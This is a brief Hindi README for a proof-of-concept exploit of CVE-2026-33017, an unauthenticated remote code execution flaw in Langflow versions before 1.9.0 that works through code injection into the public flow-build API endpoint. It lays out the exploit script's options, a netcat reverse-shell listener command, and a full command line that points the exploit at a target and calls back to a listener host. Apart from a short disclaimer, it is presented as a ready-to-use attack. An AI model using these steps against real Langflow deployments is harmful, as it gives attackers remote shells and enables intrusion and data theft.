
CVE-2026-33017 एक्सप्लॉइट | द्वारा infrar3d
द्वारा शोषित infrar3d
यह प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट Langflow के 1.9.0 से पहले के संस्करणों में एक गंभीर रिमोट कोड निष्पादन (RCE) भेद्यता को लक्षित करता है। यह भेद्यता अप्रमाणित हमलावरों को फ्लो बिल्डिंग API एंडपॉइंट के माध्यम से दुर्भावनापूर्ण Python कोड इंजेक्ट करके मनमानी सिस्टम कमांड निष्पादित करने की अनुमति देती है। भेद्यता /api/v1/build_public_tmp/{flow_id}/flow endpoint में मौजूद है, जो कंपोनेंट टेम्पलेट्स के कोड फील्ड में उपयोगकर्ता द्वारा प्रदान किए गए कोड को अनुचित रूप से सैनिटाइज़ करता है।
python3 CVE-2026-33017.py --help
usage: CVE-2026-33017.py [-h] -u URL -f FLOW -H HOST [-P PORT]
Langflow RCE Exploit
options:
-h, --help show this help message and exit
-u, --url URL Target base URL
-f, --flow FLOW Flow ID
-H, --host HOST Listener host for reverse shell
-P, --port PORT Listener port (default: 4444)
पहला टर्मिनल (लिसनर):
nc -lvnp 4444
दूसरा टर्मिनल (एक्सप्लॉइट):
python3 CVE-2026-33017.py --url https://fireflowservice.example --flow abcd1234-efgh-5678-ijkl-9012mnop --host 10.10.10.10 --port 4444
यह सॉफ्टवेयर और प्रूफ-ऑफ-कॉन्सेप्ट कोड केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है।
आप सभी लागू कानूनों का पालन करने के लिए जिम्मेदार हैं। नैतिक और जिम्मेदारीपूर्वक उपयोग करें।